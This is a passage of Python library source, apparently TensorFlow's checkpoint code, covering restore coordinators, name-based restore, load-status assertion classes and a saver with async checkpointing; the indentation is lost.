self.unused_attributes = {}
# Dictionary mapping from an id in the protocol buffer flat array to
# Trackable Python objects. This mapping may be deferred if a
# checkpoint is restored before all dependencies have been tracked. Uses
# weak references so that partial restorations don't create reference cycles
# (as objects with deferred dependencies will generally have references to
# this object).
self.object_by_proto_id = weakref.WeakValueDictionary()
self.matched_proto_ids = set()
# A set of all Python objects we've seen as dependencies, even if we didn't
# use them (for example because of inconsistent references when
# loading). Used to make status assertions fail when loading checkpoints
# that don't quite match.
self.all_python_objects = object_identity.ObjectIdentityWeakSet()
self.save_path_tensor = save_path_tensor
self.save_path_string = save_path
self.reader = reader
if self.reader is None:
self.reader = py_checkpoint_reader.NewCheckpointReader(save_path)
self.dtype_map = reader.get_variable_to_dtype_map()
self.shape_map = reader.get_variable_to_shape_map()
# A NewCheckpointReader for the most recent checkpoint, for streaming Python
# state restoration.
# When graph building, contains a list of ops to run to restore objects from
# this checkpoint.
self.restore_ops = []
self.restore_ops_by_name = restore_op_cache
self.graph_view = graph_view
self.new_restore_ops_callback = None
# A mapping from optimizer proto ids to lists of slot variables to be
# restored when the optimizer is tracked. Only includes slot variables whose
# regular variables have already been created, and only for optimizer
# objects which have not yet been created/tracked.
self.deferred_slot_restorations = {}
# A mapping from variable proto ids to lists of slot variables to be
# restored when the variable is created/tracked. These get shifted over to
# deferred_slot_restorations if the optimizer hasn't been created when that
# happens.
self.slot_restorations = {}
# Controls whether errors are printed in __del__ if some objects did not
# match.
self.expect_partial_attr = False
for node_index, node in enumerate(self.object_graph_proto.nodes):
for slot_reference in node.slot_variables:
# `node` refers to an `Optimizer`, since only these have slot variables.
self.slot_restorations.setdefault(
slot_reference.original_variable_node_id, []).append(
base._SlotVariableRestoration( # pylint: disable=protected-access
optimizer_id=node_index,
slot_variable_id=slot_reference.slot_variable_node_id,
slot_name=slot_reference.slot_name))
self._deleter = _CheckpointRestoreCoordinatorDeleter(
self.expect_partial_attr,
self.object_graph_proto,
self.matched_proto_ids,
self.unused_attributes)
self.saveables_cache = saveables_cache
@property
def expect_partial(self):
return self.expect_partial_attr
@expect_partial.setter
def expect_partial(self, expect_partial):
self.expect_partial_attr = expect_partial
self._deleter.set_expect_partial(expect_partial)
def new_restore_ops(self, new_ops):
self.restore_ops.extend(new_ops)
if self.new_restore_ops_callback:
self.new_restore_ops_callback(new_ops) # pylint: disable=not-callable
def restore_saveables(self,
tensor_saveables,
python_saveables,
registered_savers=None):
"""Run or build restore operations for SaveableObjects.
Args:
tensor_saveables: `SaveableObject`s which correspond to Tensors.
python_saveables: `PythonStateSaveable`s which correspond to Python
values.
registered_savers: a dict mapping saver names-> object name -> Trackable.
Returns:
When graph building, a list of restore operations, either cached or newly
created, to restore `tensor_saveables`.
"""
restore_ops = []
# Eagerly run restorations for Python state.
for saveable in python_saveables:
spec_names = [spec.name for spec in saveable.specs]
saveable.python_restore(
[self.reader.get_tensor(name) for name in spec_names])
# If we have new SaveableObjects, extract and cache restore ops.
if tensor_saveables or registered_savers:
validated_saveables = saveable_object_util.validate_and_slice_inputs(
tensor_saveables)
validated_names = set(saveable.name for saveable in validated_saveables)
if set(tensor_saveables.keys()) != validated_names:
raise AssertionError(
"Saveable keys changed when validating. Got back "
f"{tensor_saveables.keys()}, was expecting {validated_names}")
new_restore_ops = functional_saver.MultiDeviceSaver(
validated_saveables,
registered_savers).restore(self.save_path_tensor, self.options)
if not context.executing_eagerly():
for name, restore_op in sorted(new_restore_ops.items()):
restore_ops.append(restore_op)
assert name not in self.restore_ops_by_name
self.restore_ops_by_name[name] = restore_op
return restore_ops
class _NameBasedRestoreCoordinator(object):
"""Keeps the status of a name-based checkpoint restore."""
def __init__(self, save_path, dtype_map=None):
self.save_path = save_path
self.dtype_map = dtype_map
# A map from trackable objects to unused attribute names. We don't have
# proto IDs when doing a name-based restore, so the map keys differ from
# those in _CheckpointRestoreCoordinator.
self.unused_attributes = object_identity.ObjectIdentityWeakKeyDictionary()
self.restore_uid = ops.uid()
def globally_named_object_attributes(self, trackable):
"""Create globally named SaveableObjects from attributes.
If an object's attribute has no global name specified (default construction
for the SaveableObject factory), records the failure in
`self.unused_attributes` (which can then be used to make status assertions
fail; see `NameBasedSaverStatus`).
Args:
trackable: An object to save.
Yields:
SaveableObjects for `trackable`'s attributes.
"""
for attribute_name, saveable_factory in (
trackable._gather_saveables_for_checkpoint().items()): # pylint: disable=protected-access
if callable(saveable_factory):
try:
# This saveable object factory does not have a default name= argument,
# which means there's no way to save/restore it using a name-based
# checkpoint. Ignore the error now and make sure assert_consumed()
# fails.
saveable = saveable_factory()
except TypeError:
self.unused_attributes.setdefault(trackable,
[]).append(attribute_name)
continue
else:
saveable = saveable_factory
names_to_saveables = saveable_object_util.op_list_to_dict(
[saveable], convert_variable_to_tensor=False)
for name, op in names_to_saveables.items():
for saveable_object in saveable_object_util.saveable_objects_for_op(
op=op, name=name):
yield saveable_object
def eager_restore(self, trackable):
"""Runs restore ops for `trackable`'s attributes."""
# When graph building, we don't add any restore ops to the graph until
# run_restore_ops/initialize_or_restore on the status object for name-based
# checkpoints.
assert context.executing_eagerly()
for saveable in self.globally_named_object_attributes(trackable):
restored_tensors = []
tensor_missing = False
for spec in saveable.specs:
if spec.name in self.dtype_map:
with ops.device("cpu:0"):
restored, = io_ops.restore_v2(
prefix=self.save_path,
tensor_names=[spec.name],
shape_and_slices=[""],
dtypes=[self.dtype_map[spec.name]],
name="%s_checkpoint_read" % (spec.name,))
restored_tensors.append(array_ops.identity(restored))
else:
tensor_missing = True
if tensor_missing:
# Record that this variable didn't match so assertions will fail.
self.unused_attributes.setdefault(trackable, []).append(saveable.name)
else:
# Ignores values missing from the checkpoint, as with object-based
# restore. Status assertions can be used to check exact matches,
# although it's unlikely to ever happen for name-based checkpoints.
saveable.restore(
restored_tensors=restored_tensors, restored_shapes=None)
# TODO(allenl): If this ends up in a public API, consider adding LINT.If Change
# or consolidating the implementation with get_variable.
def _default_getter(name,
shape,
dtype,
initializer=None,
partition_info=None,
**kwargs):
"""A pared-down version of get_variable which does not reuse variables."""
dtype = dtypes.as_dtype(dtype)
shape_object = tensor_shape.as_shape(shape)
with ops.init_scope():
if initializer is None:
initializer, initializing_from_value = (
variable_scope._get_default_variable_store()._get_default_initializer( # pylint: disable=protected-access
name=name,
shape=shape_object,
dtype=dtype))
else:
initializing_from_value = not callable(initializer)
# Same logic as get_variable
variable_dtype = dtype.base_dtype
if initializing_from_value:
if shape is not None:
raise ValueError("If initializer is a constant, do not specify shape.")
initial_value = initializer
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
shape_list = None if shape is None else shape_object.as_list()
if "partition_info" in tf_inspect.getargspec(initializer).args:
initial_value = functools.partial(initializer,
shape_list,
dtype=dtype,
partition_info=partition_info)
else:
initial_value = functools.partial(initializer,
shape_list,
dtype=dtype)
return variables.VariableV1(
initial_value=initial_value,
name=name,
dtype=variable_dtype,
use_resource=True,
**kwargs)
def add_variable(trackable,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
trainable=True):
"""Add a variable to a Trackable with no scope influence."""
return trackable._add_variable_with_custom_getter( # pylint: disable=protected-access
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
getter=_default_getter,
trainable=trainable)
def object_metadata(save_path):
"""Retrieves information about the objects in a checkpoint.
Example usage:
```python
object_graph = tf.contrib.checkpoint.object_metadata(
tf.train.latest_checkpoint(checkpoint_directory))
ckpt_variable_names = set()
for node in object_graph.nodes:
for attribute in node.attributes:
ckpt_variable_names.add(attribute.full_name)
```
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`.
Returns:
A parsed `tf.contrib.checkpoint.TrackableObjectGraph` protocol buffer.
Raises:
ValueError: If an object graph was not found in the checkpoint.
"""
reader = py_checkpoint_reader.NewCheckpointReader(save_path)
try:
object_graph_string = reader.get_tensor(base.OBJECT_GRAPH_PROTO_KEY)
except errors_impl.NotFoundError:
raise ValueError(
f"The specified checkpoint \"{save_path}\" does not appear to be "
"object-based (saved with TF2) since it is missing the key "
f"\"{base.OBJECT_GRAPH_PROTO_KEY}\". Likely it was created with the "
"TF1 name-based saver and does not contain an object dependency graph.")
object_graph_proto = (trackable_object_graph_pb2.TrackableObjectGraph())
object_graph_proto.ParseFromString(object_graph_string)
return object_graph_proto
def list_objects(root_trackable):
"""Traverse the object graph and list all accessible objects.
Looks for `Trackable` objects which are dependencies of
`root_trackable`. Includes slot variables only if the variable they are
slotting for and the optimizer are dependencies of `root_trackable`
(i.e. if they would be saved with a checkpoint).
Args:
root_trackable: A `Trackable` object whose dependencies should be flattened.
Returns:
A flat list of objects.
"""
return util.list_objects(graph_view_lib.ObjectGraphView(root_trackable))
def gather_initializers(root_trackable):
"""Traverse the object graph and find initialization ops.
Looks for `Trackable` objects which are dependencies of
`root_trackable` and which have an `initializer` property. Includes
initializers for slot variables only if the variable they are slotting for and
the optimizer are dependencies of `root_trackable` (i.e. if they would be
saved with a checkpoint).
Args:
root_trackable: A `Trackable` object to gather initializers for.
Returns:
A list of initialization ops.
"""
trackable_objects = list_objects(root_trackable)
return [
c.initializer
for c in trackable_objects
if hasattr(c, "initializer") and c.initializer is not None
]
@tf_contextlib.contextmanager
def capture_dependencies(template):
"""Capture variables created within this scope as `Template` dependencies.
Requires that `template.variable_scope` is active.
This scope is intended as a compatibility measure, allowing a trackable
object to add dependencies on variables created in a block of code which is
not aware of object-based saving (and instead uses variable names
heavily). This is how `Template` objects add dependencies on variables and
sub-`Template`s. Where possible, use `tf.compat.v1.make_template` directly.
Args:
template: The `Template` object to register dependencies with.
Yields:
None (when used as a context manager).
"""
name_prefix = template.variable_scope.name
def _trackable_custom_creator(next_creator,
name,
initial_value,
trackable_parent=None,
**kwargs):
"""A variable creation hook which adds Trackable dependencies.
Set for example during a `Template`'s first wrapped function
execution. Ensures that (a) `template` depends on any trackable
objects using their own `capture_dependencies` scope inside this scope which
create variables, and (b) that any variables not in a more deeply nested
scope are added as dependencies directly.
The `trackable_parent` argument is passed between custom creators but
ignored when the variable object itself is created. This argument indicates
(if not `None`) that a more deeply nested scope has already added the
variable as a dependency, and that parent scopes should add a dependency on
that object rather than on the variable directly.
Args:
next_creator: See `variable_scope.variable_creator_scope`; the next
creator in the chain.
name: The (full, scope-influenced) name of the variable. The `name_prefix`
itself is stripped for the purposes of object-based dependency tracking,
but scopes opened within this scope are respected.
initial_value: See `variable_scope.variable_creator_scope`. Taken
explicitly so the argument can be re-named and used with
`Trackable._add_variable_with_custom_getter`.
trackable_parent: If not None, a more deeply nested trackable object and
its name prefix which were passed to `capture_dependencies` to add a
dependency on (rather than depending on the variable directly).
**kwargs: Passed through to the next creator.
Returns:
The output of `next_creator`: the fetched/created variable object.
"""
def _call_next_creator_renaming_initializer(initializer, **inner_kwargs):
inner_kwargs.pop("name") # Ignored; this is the scope-stripped name which
# we don't want to propagate.
return next_creator(initial_value=initializer, name=name, **inner_kwargs)
if name is not None and name.startswith(name_prefix):
scope_stripped_name = name[len(name_prefix) + 1:]
if not trackable_parent:
return template._add_variable_with_custom_getter( # pylint: disable=protected-access
initializer=initial_value,
name=scope_stripped_name,
getter=_call_next_creator_renaming_initializer,
# Disable error checking for Trackable. Exceptions are instead
# raised if necessary when the object-based saver tries to
# save/restore the object.
overwrite=True,
trackable_parent=(template, name_prefix),
**kwargs)
else:
parent_object, parent_name_prefix = trackable_parent
template._track_trackable( # pylint: disable=protected-access
parent_object,
name=parent_name_prefix[len(name_prefix) + 1:],
overwrite=True)
return next_creator(
name=name,
initial_value=initial_value,
trackable_parent=(template, name_prefix),
**kwargs)
with variable_scope.variable_creator_scope(_trackable_custom_creator):
yield
class _LoadStatus(object):
"""Abstract base for load status callbacks."""
@abc.abstractmethod
def assert_consumed(self):
"""Raises an exception unless a non-trivial restoration has completed."""
pass
@abc.abstractmethod
def assert_existing_objects_matched(self):
"""Raises an exception unless existing Python objects have been matched."""
pass
@abc.abstractmethod
def assert_nontrivial_match(self):
"""Raises an exception if only the root object matched."""
pass
@abc.abstractmethod
def run_restore_ops(self, session=None):
"""Runs restore ops from the checkpoint. Requires a valid checkpoint."""
pass
@abc.abstractmethod
def initialize_or_restore(self, session=None):
"""Runs restore ops from the checkpoint, or initializes variables."""
pass
def expect_partial(self):
"""Silence warnings about incomplete checkpoint restores."""
return self
@tf_export("__internal__.tracking.streaming_restore", v1=[])
def streaming_restore(status, session=None):
"""When graph building, runs restore ops as soon as they come in.
Args:
status: A _LoadStatus objects from an object-based saver's restore().
Streaming restore from name-based checkpoints is not currently supported.
session: A session to run new restore ops in.
"""
if context.executing_eagerly():
# Streaming restore is the default/only behavior when executing eagerly.
return
if session is None:
session = get_session()
if isinstance(status, NameBasedSaverStatus):
raise NotImplementedError(
"Streaming restore not supported from name-based checkpoints when "
"graph building. File a feature request if this limitation bothers "
"you. As a workaround, consider either using tf.train.Checkpoint to "
"load name-based checkpoints or enabling eager execution.")
status.run_restore_ops(session=session)
# pylint: disable=protected-access
status._checkpoint.new_restore_ops_callback = (
lambda ops: session.run(ops, feed_dict=status._feed_dict))
# pylint: enable=protected-access
def _objects_with_attributes(full_list):
"""Filters out objects with no direct variable dependencies for assertions."""
return [o for o in full_list if o._gather_saveables_for_checkpoint()] # pylint: disable=protected-access
class CheckpointLoadStatus(_LoadStatus):
"""Checks the status of checkpoint loading and manages restore ops.
Returned from `Saver.restore`. Since `restore` may defer the loading of values
in the checkpoint which don't yet have corresponding Python objects,
`CheckpointLoadStatus` provides a callback to verify that checkpoint loading
is complete (`assert_consumed`).
When graph building, `restore` does not run restore ops itself since their
creation may be deferred. The `run_restore_ops` method must be called once all
Python objects with values to restore have been created and added to the
dependency graph (this does not necessarily have to be the whole checkpoint;
calling `run_restore_ops` while `assert_consumed` fails is supported and will
partially restore the checkpoint).
See `Saver.restore` for usage examples.
"""
def __init__(self, checkpoint, feed_dict, graph_view):
self._checkpoint = checkpoint
self._feed_dict = feed_dict
self._object_graph_view = graph_view
# Keep a reference to the root, since object_graph_view might only have a
# weakref.
self._root = graph_view.root
def assert_consumed(self):
"""Asserts that all objects in the checkpoint have been created/matched.
Returns:
`self` for chaining.
Raises:
AssertionError: If there are any Python objects in the dependency graph
which have not been restored from this checkpoint or a later `restore`,
or if there are any checkpointed values which have not been matched to
Python objects.
"""
pretty_printer = ObjectGraphProtoPrettyPrinter(
self._checkpoint.object_graph_proto)
self.assert_existing_objects_matched()
for node_id, node in enumerate(self._checkpoint.object_graph_proto.nodes):
if not node.attributes:
# Only raise exceptions for the nodes with attributes themselves. Either
# they're ultimately not important, or they have a child with an
# attribute.
continue
trackable = self._checkpoint.object_by_proto_id.get(node_id, None)
if trackable is None:
raise AssertionError(
"Unresolved object in checkpoint "
f"{pretty_printer.node_names[node_id]}: {node}")
if self._checkpoint.slot_restorations:
# Sanity check; this collection should be clear if everything has been
# restored.
raise AssertionError(
f"Unresolved slot restorations: {self._checkpoint.slot_restorations}")
if self._checkpoint.unused_attributes:
unused_attribute_messages = []
for node_id, attribute in six.iteritems(
self._checkpoint.unused_attributes):
obj = self._checkpoint.object_by_proto_id[node_id]
unused_attribute_messages.append(
f"{pretty_printer.node_names[node_id]} ({obj}): {attribute}")
joined_attribute_messages = "\n".join(unused_attribute_messages)
raise AssertionError(
"Unused attributes in these objects (the attributes exist in the "
f"checkpoint but were not restored):\n{joined_attribute_messages}")
return self
def assert_existing_objects_matched(self):
"""Asserts that trackable Python objects have been matched.
Note that this is a weaker assertion than `assert_consumed`. It will only
fail for existing Python objects which are (transitive) dependencies of the
root object and which do not have an entry in the checkpoint.
It will not fail, for example, if a `tf.keras.Layer` object has not yet been
built and so has not created any `tf.Variable` objects.
Returns:
`self` for chaining.
Raises:
AssertionError: If a Python object exists in the transitive dependencies
of the root object but does not have a value in the checkpoint.
"""
for node_id, node in enumerate(self._checkpoint.object_graph_proto.nodes):
trackable = self._checkpoint.object_by_proto_id.get(node_id, None)
if (trackable is not None and
trackable._update_uid < self._checkpoint.restore_uid): # pylint: disable=protected-access
raise AssertionError(
f"Object {node} not assigned a value from checkpoint.")
for trackable_object in util.list_objects(self._object_graph_view):
# Remove data structures that do not contain any variables from
# restoration checks.
if (isinstance(trackable_object,
data_structures.TrackableDataStructure) and
not trackable_object._trackable_children()): # pylint: disable=protected-access
continue
self._checkpoint.all_python_objects.add(trackable_object)
unused_python_objects = (
object_identity.ObjectIdentitySet(
_objects_with_attributes(
self._checkpoint.all_python_objects)) -
object_identity.ObjectIdentitySet(
self._checkpoint.object_by_proto_id.values()))
if unused_python_objects:
num_unused_python_objects = len(list(unused_python_objects))
# Display max number of 10 variables in error message.
num_variables_to_show = min(10, num_unused_python_objects)
raise AssertionError(
f"Found {num_unused_python_objects} Python objects that were "
"not bound to checkpointed values, likely due to changes in the "
f"Python program. Showing {num_variables_to_show} of "
f"{num_unused_python_objects} unmatched objects: "
f"{list(unused_python_objects)[:num_variables_to_show]}")
return self
def assert_nontrivial_match(self):
"""Raises an exception if only the root object matched."""
for trackable_object in util.list_objects(self._object_graph_view):
self._checkpoint.all_python_objects.add(trackable_object)
if len(self._checkpoint.object_by_proto_id) <= 1:
unused_python_objects = (
object_identity.ObjectIdentitySet(
_objects_with_attributes(self._checkpoint.all_python_objects)) -
object_identity.ObjectIdentitySet(
self._checkpoint.object_by_proto_id.values()))
if unused_python_objects:
raise AssertionError(
"Nothing except the root object matched a checkpointed value. "
"Typically this means that the checkpoint does not match the "
"Python program. The following objects have no matching "
f"checkpointed value: {list(unused_python_objects)}")
else:
raise AssertionError(
"Nothing to load. No dependencies have been added to "
f"{self._object_graph_view.root} yet.")
return self
def run_restore_ops(self, session=None):
"""Run operations to restore objects in the dependency graph."""
if context.executing_eagerly():
return # Run eagerly
if session is None:
session = get_session()
session.run(self._checkpoint.restore_ops, feed_dict=self._feed_dict)
def initialize_or_restore(self, session=None):
"""Run operations to initialize or restore objects in the dependency graph.
Any objects in the dependency graph which have initializers but are not in
the checkpoint will have those initializers run, unless those variables are
being restored by a later call to `tf.train.Checkpoint.restore()`.
This method has a sibling in `InitializationOnlyStatus` which instead
initializes variables. That type is returned if no checkpoint is specified
in `Saver.restore`.
Args:
session: The session to run init/restore ops in. If `None`, uses the
default session.
"""
if context.executing_eagerly():
return # Initialization and restoration ops are run eagerly
if session is None:
session = get_session()
all_objects = util.list_objects(self._object_graph_view)
already_initialized_objects = object_identity.ObjectIdentitySet(
self._checkpoint.object_by_proto_id.values())
initializers_for_non_restored_variables = [
c.initializer for c in all_objects
if hasattr(c, "initializer")
and c not in already_initialized_objects
and (getattr(c, "_update_uid", self._checkpoint.restore_uid - 1)
< self._checkpoint.restore_uid)
]
self.run_restore_ops(session=session)
session.run(initializers_for_non_restored_variables)
def expect_partial(self):
"""Silence warnings about incomplete checkpoint restores."""
self._checkpoint.expect_partial = True
return self
class InitializationOnlyStatus(_LoadStatus):
"""Returned from `Saver.restore` when no checkpoint has been specified.
Objects of this type have the same `assert_consumed` method as
`CheckpointLoadStatus`, but it always fails. However,
`initialize_or_restore` works on objects of both types, and will
initialize variables in `InitializationOnlyStatus` objects or restore them
otherwise.
"""
def __init__(self, object_graph_view, restore_uid):
self._restore_uid = restore_uid
self._object_graph_view = object_graph_view
# Keep a reference to the root, since graph_view might only have a weakref.
self._root = object_graph_view.root
def assert_consumed(self):
"""Assertion for consistency with `CheckpointLoadStatus`. Always fails."""
raise AssertionError(
"No checkpoint specified (save_path=None); nothing is being restored.")
def assert_existing_objects_matched(self):
"""Assertion for consistency with `CheckpointLoadStatus`. Always fails."""
raise AssertionError(
"No checkpoint specified (save_path=None); nothing is being restored.")
def assert_nontrivial_match(self):
"""Assertion for consistency with `CheckpointLoadStatus`. Always fails."""
raise AssertionError(
"No checkpoint specified (save_path=None); nothing is being restored.")
def run_restore_ops(self, session=None):
"""For consistency with `CheckpointLoadStatus`.
Use `initialize_or_restore` for initializing if no checkpoint was passed
to `Saver.restore` and restoring otherwise.
Args:
session: Not used.
"""
raise AssertionError(
"No checkpoint specified, so no restore ops are available "
"(save_path=None to Saver.restore).")
def initialize_or_restore(self, session=None):
"""Runs initialization ops for variables.
Objects which would be saved by `Saver.save` will be initialized, unless
those variables are being restored by a later call to
`tf.train.Checkpoint.restore()`.
This method does nothing when executing eagerly (initializers get run
eagerly).
Args:
session: The session to run initialization ops in. If `None`, uses the
default session.
"""
if context.executing_eagerly():
return # run eagerly
if session is None:
session = get_session()
trackable_objects = util.list_objects(self._object_graph_view)
initializers = [
c.initializer for c in trackable_objects
if hasattr(c, "initializer") and c.initializer is not None
and (getattr(c, "_update_uid", self._restore_uid - 1)
< self._restore_uid)
]
session.run(initializers)
_DEPRECATED_RESTORE_INSTRUCTIONS = (
"Restoring a name-based tf.train.Saver checkpoint using the object-based "
"restore API. This mode uses global names to match variables, and so is "
"somewhat fragile. It also adds new restore ops to the graph each time it "
"is called when graph building. Prefer re-encoding training checkpoints in "
"the object-based format: run save() on the object-based saver (the same "
"one this message is coming from) and use that checkpoint in the future.")
class NameBasedSaverStatus(_LoadStatus):
"""Status for loading a name-based training checkpoint."""
# Ideally this deprecation decorator would be on the class, but that
# interferes with isinstance checks.
@deprecation.deprecated(
date=None, instructions=_DEPRECATED_RESTORE_INSTRUCTIONS)
def __init__(self, checkpoint, object_graph_view):
self._checkpoint = checkpoint
self._object_graph_view = object_graph_view
self._optionally_restored = []
# Keep a reference to the root, since graph_view might only have a weakref.
self._root = object_graph_view.root
def add_to_optionally_restored(self, var):
"""Add a variable to the list of optionally restored variables.
There are situations where certain variables should be ignored in assertions
such as assert_existing_objects_matched(). One example is that of a
checkpoint saved with train.Saver(), and restored with train.Checkpoint():
it is possible for the train.Saver() checkpoint to be missing the internal
`save_counter` variable, which we want to ignore on restore.
Args:
var: The variable to treat as optionally restored.
"""
self._optionally_restored.append(var)
def assert_consumed(self):
"""Raises an exception if any variables are unmatched."""
unused_attributes = list(self._checkpoint.unused_attributes.items())
unused_attributes = [
a for a in unused_attributes
if all(a[0] is not x for x in self._optionally_restored)
]
if unused_attributes:
unused_attribute_strings = [
f"\n {obj}: {attributes}" for obj, attributes in unused_attributes]
raise AssertionError(
"Some objects had attributes which were not restored: "
f"{unused_attribute_strings}")
for trackable in util.list_objects(self._object_graph_view):
# pylint: disable=protected-access
trackable._maybe_initialize_trackable()
if trackable._update_uid < self._checkpoint.restore_uid:
raise AssertionError(f"Object not restored: {trackable}")
# pylint: enable=protected-access
return self
def assert_existing_objects_matched(self):
"""Raises an exception if currently created objects are unmatched."""
# For name-based checkpoints there's no object information in the
# checkpoint, so there's no distinction between
# assert_existing_objects_matched and assert_consumed (and both are less
# useful since we don't touch Python objects or Python state).
return self.assert_consumed()
def assert_nontrivial_match(self):
"""Raises an exception if currently created objects are unmatched."""
# For name-based checkpoints there's no object information in the
# checkpoint, so there's no distinction between
# assert_nontrivial_match and assert_consumed (and both are less
# useful since we don't touch Python objects or Python state).
return self.assert_consumed()
def _gather_saveable_objects(self):
"""Walk the object graph, using global names for SaveableObjects."""
objects = util.list_objects(self._object_graph_view)
saveable_objects = []
for trackable in objects:
# pylint: disable=protected-access
trackable._maybe_initialize_trackable()
if trackable._update_uid < self._checkpoint.restore_uid:
trackable._update_uid = self._checkpoint.restore_uid
else:
continue
# pylint: enable=protected-access
saveable_objects.extend(
self._checkpoint.globally_named_object_attributes(trackable))
return saveable_objects
def run_restore_ops(self, session=None):
"""Load the name-based checkpoint using a new `tf.compat.v1.train.Saver`."""
if context.executing_eagerly():
return # Nothing to do, variables are restored on creation.
if session is None:
session = get_session()
with ops.device("/cpu:0"):
saveables = self._gather_saveable_objects()
v1_saver_lib.Saver(saveables).restore(
sess=session, save_path=self._checkpoint.save_path)
def initialize_or_restore(self, session=None):
"""Alias for `run_restore_ops`."""
self.run_restore_ops(session=session)
class _SessionWithFeedDictAdditions(session_lib.SessionInterface):
"""Pretends to be a session, inserts extra feeds on run()."""
def __init__(self, session, feed_additions):
self._wrapped_session = session
self._feed_additions = feed_additions
def run(self, fetches, feed_dict=None, **kwargs):
if feed_dict is None:
feed_dict = {}
else:
feed_dict = feed_dict.copy()
feed_dict.update(self._feed_additions)
return self._wrapped_session.run(
fetches=fetches, feed_dict=feed_dict, **kwargs)
class TrackableSaver(object):
"""Saves and restores a `Trackable` object and its dependencies.
See `Trackable` for details of dependency management. `Saver` wraps
`tf.compat.v1.train.Saver` for saving, including extra information about the
graph of
dependencies between Python objects. When restoring, it uses this information
about the save-time dependency graph to more robustly match objects with their
checkpointed values. When executing eagerly, it supports restoring variables
on object creation (see `Saver.restore`).
Values in a checkpoint are mapped to `Trackable` Python objects
(`Variable`s, `Optimizer`s, `Layer`s) based on the names provided when the
checkpoint was written. To avoid breaking existing checkpoints when modifying
a class, dependency names (the names of attributes to which `Trackable`
objects are assigned) may not change. These names are local to objects, in
contrast to the `Variable.name`-based save/restore from
`tf.compat.v1.train.Saver`, and
so allow additional program transformations.
"""
def __init__(self, graph_view):
"""Configure saving.
Args:
graph_view: An `ObjectGraphView` object containing a description of the
object graph to save.
"""
self._graph_view = graph_view
# The following attributes are used when graph building.
# Saveables caching: A dictionary mapping `Trackable` objects ->
# attribute names -> SaveableObjects, used to avoid re-creating
# SaveableObjects when graph building.
if context.executing_eagerly():
self._saveables_cache = None
else:
self._saveables_cache = object_identity.ObjectIdentityWeakKeyDictionary()
# The file prefix placeholder is created lazily when graph building (and not
# at all when executing eagerly) to avoid creating ops in the constructor
# (when they may never be necessary).
self._file_prefix_placeholder = None
# Op caching for save
self._object_graph_feed_tensor = None
self._last_save_object_graph = None
self._file_prefix_feed_tensor = None
self._cached_save_operation = None
# Op caching for restore, shared between _CheckpointRestoreCoordinators
self._restore_op_cache = {}
def _gather_saveables(self, object_graph_tensor=None):
"""Wraps _serialize_object_graph to include the object graph proto."""
named_saveable_objects, graph_proto, feed_additions, registered_savers = (
util.serialize_object_graph_with_registered_savers(
self._graph_view, self._saveables_cache))
if object_graph_tensor is None:
with ops.device("/cpu:0"):
object_graph_tensor = constant_op.constant(
graph_proto.SerializeToString(), dtype=dtypes.string)
else:
feed_additions.update(
{object_graph_tensor: graph_proto.SerializeToString()})
assert base.OBJECT_GRAPH_PROTO_KEY not in named_saveable_objects
named_saveable_objects.append(
base.NoRestoreSaveable(
tensor=object_graph_tensor, name=base.OBJECT_GRAPH_PROTO_KEY))
return (named_saveable_objects, graph_proto, feed_additions,
registered_savers)
def _save_cached_when_graph_building(self,
file_prefix,
object_graph_tensor,
options,
update_ckpt_state=False):
"""Create or retrieve save ops.
Args:
file_prefix: The prefix for saved checkpoint files.
object_graph_tensor: A `Tensor` to which the current object graph will be
fed.
options: `CheckpointOptions` object.
update_ckpt_state: Optional bool flag. Indiciate whether the internal
checkpoint state needs to be updated.
Returns:
A two-element tuple with a filename tensor and a feed_dict of tensors to
feed when running it (if graph building). The feed dict contains the
current object graph and any Python state to be saved in the
checkpoint. When executing eagerly only the first argument is meaningful.
"""
(named_saveable_objects, graph_proto, feed_additions,
registered_savers) = self._gather_saveables(
object_graph_tensor=object_graph_tensor)
def _run_save():
"""Create and execute the SaveOp for the checkpoint."""
if (self._last_save_object_graph != graph_proto
# When executing eagerly, we need to re-create SaveableObjects each
# time save() is called so they pick up new Tensors passed to their
# constructors. That means the Saver needs to be copied with a new
# var_list.
or context.executing_eagerly() or ops.inside_function()):
saver = functional_saver.MultiDeviceSaver(named_saveable_objects,
registered_savers)
save_op = saver.save(file_prefix, options=options)
with ops.device("/cpu:0"):
with ops.control_dependencies([save_op]):
self._cached_save_operation = array_ops.identity(file_prefix)
self._last_save_object_graph = graph_proto
return self._cached_save_operation, feed_additions
def _copy_tensors():
"""Copy the tensors to the host CPU device."""
for saveable in named_saveable_objects:
# Pin the device according to the SaveableObject's device location to
# avoid unnecessary data copies when reading the variables. This is
# aligned with the behavior in MultiDeviceSaver.save().
original_device = saveable.device
with ops.device(original_device):
for spec in saveable.specs:
tensor = spec.tensor
device = spec.device
if tensor is not None:
with ops.device(saveable_object_util.set_cpu0(device)):
spec._tensor = array_ops.identity(tensor) # pylint: disable=protected-access
# Modify the device info accordingly now that the tensors are
# copied to the host CPU device.
spec.device = saveable_object_util.set_cpu0(device)
def _async_save_fn():
"""The thread function for executing async checkpoint save."""
with context.executor_scope(
executor.new_executor(
enable_async=False, enable_streaming_enqueue=False)):
_run_save()
# Update the internal checkpoint state if the checkpoint event is
# triggered from Checkpoint.save().
if update_ckpt_state:
_update_checkpoint_state_internal(
_convert_file_name_tensor_to_string(file_prefix))
if options.experimental_enable_async_checkpoint:
# Execute async-checkpoint.
# Step-1: Explicitly copy the tensors to their host CPU device.
_copy_tensors()
# Step-2: Execute the rest of the checkpoint operations on the host device
# using an async executor.
global _ASYNC_CHECKPOINT_THREAD
if _ASYNC_CHECKPOINT_THREAD is not None:
_ASYNC_CHECKPOINT_THREAD.join()
_ASYNC_CHECKPOINT_THREAD = threading.Thread(target=_async_save_fn)
_ASYNC_CHECKPOINT_THREAD.start()
# Step-3: Return the expected checkpoint file path though the save op may
# not have finished.
self._cached_save_operation = file_prefix
return self._cached_save_operation, feed_additions
# Execute the normal checkpoint, i.e., synchronous.
return _run_save()
def save(self, file_prefix, checkpoint_number=None, session=None,
options=None, update_ckpt_state=False):
"""Save a training checkpoint.
The saved checkpoint includes variables created by this object and any
Trackable objects it depends on at the time `Saver.save()` is called.
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix). Names are generated based on this
prefix and `checkpoint_number`, if provided.
checkpoint_number: An integer variable or Tensor, used to number
checkpoints. Typically this value is saved along with other variables in
